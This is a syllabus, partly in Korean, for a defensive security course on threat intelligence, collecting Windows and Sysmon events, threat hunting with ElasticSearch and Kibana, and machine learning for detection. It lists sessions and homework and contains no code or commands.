Security + Cloud + Machine Learning For Security Engineers

이 코스는 실제로 공개된 툴들을 사용하여 실제로 이벤트 수집과 분석, 머신 러닝 모델 구축이 가능한지에 대한 전반적인 지식을 전달하도록 설계되었습니다. 윈도우즈 머신의 이벤트 헌팅과 행위 정보 수집 등에 대해서도 다룹니다. 예제로 사용하는 Sysmon은 여러가지 제약에도 불구하고, 실제 기업 환경에서 실제적으로 사용되고 있습니다. 기본적으로 SIEM/EDR에 사용되는 여러 엔진들도 Sysmon의 개념에서 출발하므로 교육적인 목적으로 유용성이 많은 툴입니다. 고가의 EDR 등을 도입하기 힘든 경우 어떻게 실제 환경 구축이 가능하고, 어떠한 실질적인 제약이 있는지에 대해서도 다룹니다. 또한 개념상 SIEM과 EDR 등은 모두 비슷한 방법을 사용하여 이벤트 수집과 분석, 머신 러닝 단계로의 가공 작업이 이뤄지므로, SIEM/EDR/Threat Hunting과 같은 전반적인 개념을 공부하기에도 적당한 과정입니다.

Chapter 1: APT/Threat Intelligence/MITRE ATT&CK Matrix/Threat Analysis

  • Objectives:
    • Understanding current APT landscape, Threat Intelligence
    • Understanding threat modelling approach with MITRE ATT&CK Matrix
    • Investigating real world malware/APT attacks and investigate and match them with MITRE ATT&CK Matrix for deeper understanding
Session Duration Name Description
Session 1 0.5 hour Introduction Introduction, overview of the courses and exercise preparations
Session 1 0.3 hour Threat Intelligence APT vs Commodity Malware
Session 1 0.3 hour Threat Analysis PE vs Non-PE/Living-off-the-land Attacks
Session 1 0.3 hour Threat Modelling MITRE ATT&CK Matrix
Session 1 Homework Exercise Malware sample analysis

Chapter 2: Endpoint - Windows Events/Telemetry Collection/Event Hunting

  • Objectives:
    • Understanding Windows Events collecting methods
      • Learn using basic Windows Events tools (focusing on PowerShell cmdlets)
    • Learning Windows Events hunting
      • Based upon our knowledge on recent threat landscape, hunt for useful Windows events
Session Duration Name Description
Session 2 2 hours Windows Events Windows Events - concepts and tools
Session 2 Homework Exercise Collect Windows events from test systems
Session 3 2 hours Advanced Windows Events PowerShell/WMI/Sysmon/AMSI
Session 3 Homework Exercise Run and analyze PowerShell malware with various sensors
Session 4 2 hours Exercise Windows Events Hunting & Investigations
Session 4 Homework Exercise Run various malware and find useful events

Chapter 3: Cloud + Threat Hunting

  • Objectives:
    • Understanding cloud storage/distributed computing technology
    • Acquiring and store telemetry data from Windows Events
    • Performing threat hunting upon the collected telemetry data sets - understanding methodology and limitations
Session Duration Name Description
Session 5 2 hours Cloud Introduction to various cloud storage and distributed processing platforms (Hadoop/Spark/Azure Data Lake/ElasticSearch/Kibana)
Session 5 Homework Exercise Use Hadoop/Spark/ADL for basic exercise
Session 6 2 hours Exercise Telemetry collections and threat hunting using ElasticSearch & Kibana - Setup ElasticSearch/Kibana environment/hunt threats
Session 6 Homework Exercise Use ES/Kibana installations and exercise various basic tools & queries

Chapter 4: Heuristics

  • Objectives:
    • Understanding heuristics approach for malware/APT detections and limitations
    • Introduction to data-scientific approach to real world problems
Session Duration Name Description
Session 7 2 hours Data Science Machine Learning Algorithms
Session 7 Homework Exercise Exercise basic examples
Session 8 2 hours Exercise Timeline reconstruction (Python+Jupyter Notebook)
Session 8 Homework Exercise Construct timelines for various timeframe to find and analyze malicious actitivies
Session 9 2 hours Exercise Command line analysis
Session 9 Homework Exercise Build command line parser for basic analysis

Chapter 5: Data Science

  • Objectives:
    • Applying various data science methodologies to security problems (focusing on the machine telemetry)
    • Understanding importance of data clean-up
    • Understanding process of feature set selections and extraction methods
Session Duration Name Description
Session 10 2 hours Exercise Introduction to Machine Learning methods/concepts/exercise
Session 10 Homework Exercise Exercise basic data science examples
Session 11 2 hours Exercise Building Machine Learning Models
Session 11 Homework Exercise Exercise basic security data science examples
Session 12 2 hours Exercise Building Machine Learning Models
Session 12 Homework Exercise Exercise intermediate security data science examples

등록 정보